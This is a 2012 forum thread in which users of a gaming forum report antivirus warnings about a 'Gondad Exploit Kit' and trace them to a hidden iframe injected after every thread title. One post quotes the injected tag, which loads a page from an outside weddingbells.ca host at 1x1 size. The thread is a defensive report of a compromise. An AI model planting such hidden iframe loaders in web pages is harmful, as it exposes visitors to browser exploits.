AVG is identifying a threat from viewing this forum

**Karth** · 05-05-2012, 20:10

Remember that forums.weddingbells.ca junk that was appended to every post recently? Now I'm getting notices that AVG is blocking "Exploit Gondad Exploit Kit (type 1935)" with file name "forums.weddingbells.ca/tmp/index.html" every time I view anything on the forums here.

It was suspicious when I saw the forums.weddingbells.ca stuff appended to every post, and now this is even worse... what's going on?

**nZifnab** · 05-05-2012, 20:32

I'm also getting this. I was on this page: http://diablo.incgamers.com/forums/s...uestions/page4 and AVG popped up and with a "Threat Blocked!" warning.

File: forums.weddingbells.ca/tmp/index.html
Infection: Exploit Gondad Exploit Kit (type 1935)
Result: Object was blocked

It could be one of the ads on the site? Figured you guys should know...it's a bit alarming.

**nZifnab** · 05-05-2012, 20:43

Oh I see what you mean about forums.weddinbells appended to every post. There's a hidden ****** at the end of every thread title that links to that site. This should probably be fixed immediately...

**lyose** · 05-05-2012, 20:46

Clearly, an intruder installer malicious software on the server running this forum.

You can easily see it by the "<****** src=http://forums.weddingbells.ca/tmp/index.html width=1 height=1></******>" being included in the HTML source multiple times, with antivirus software detecting this as "Gondad Exploit Kit".

That malware apparently attempts to exploit multiple vulnerabilities in Flash, Java and others to take over the visitors' browsers.

Please fix this ASAP and take security seriously.

**nZifnab** · 05-05-2012, 20:47

I can't seem to figure out what the exploit actually does, but here's an AVG analytics of it: http://www.avgthreatlabs.com/webthre...kit/#analytics

**Tryzx** · 05-05-2012, 20:49

Originally Posted by nZifnab

Oh I see what you mean about forums.weddinbells appended to every post. There's a hidden ****** at the end of every thread title that links to that site. This should probably be fixed immediately...

I see a white square at the end of every title. Is that what you are talking about?

**Sephyron** · 05-05-2012, 21:03

Getting the same warning when entering the forums.

**Mn_Swe2** · 05-05-2012, 21:10

This is constantly alerted browsing these forums!

**Sokar Rostau** · 05-05-2012, 21:37

According to AVG, tribalfusion.com is one of the top sources for this threat.

Look at what your browser is loading next time you move around on this forum if you don't know what I'm talking about.

**TheShaft** · 05-05-2012, 21:38

NoScript FTW!

Thread: AVG is identifying a threat from viewing this forum

Thread Tools

Display

AVG is identifying a threat from viewing this forum

Re: AVG is identifying a threat from viewing this forum

Re: AVG is identifying a threat from viewing this forum

This server is compromised and attempts to exploit visitors' browsers

Re: AVG is identifying a threat from viewing this forum

Re: AVG is identifying a threat from viewing this forum

Re: This server is compromised and attempts to exploit visitors' browsers

Re: AVG is identifying a threat from viewing this forum

Re: AVG is identifying a threat from viewing this forum

Re: This server is compromised and attempts to exploit visitors' browsers

Bookmarks

Bookmarks

Posting Permissions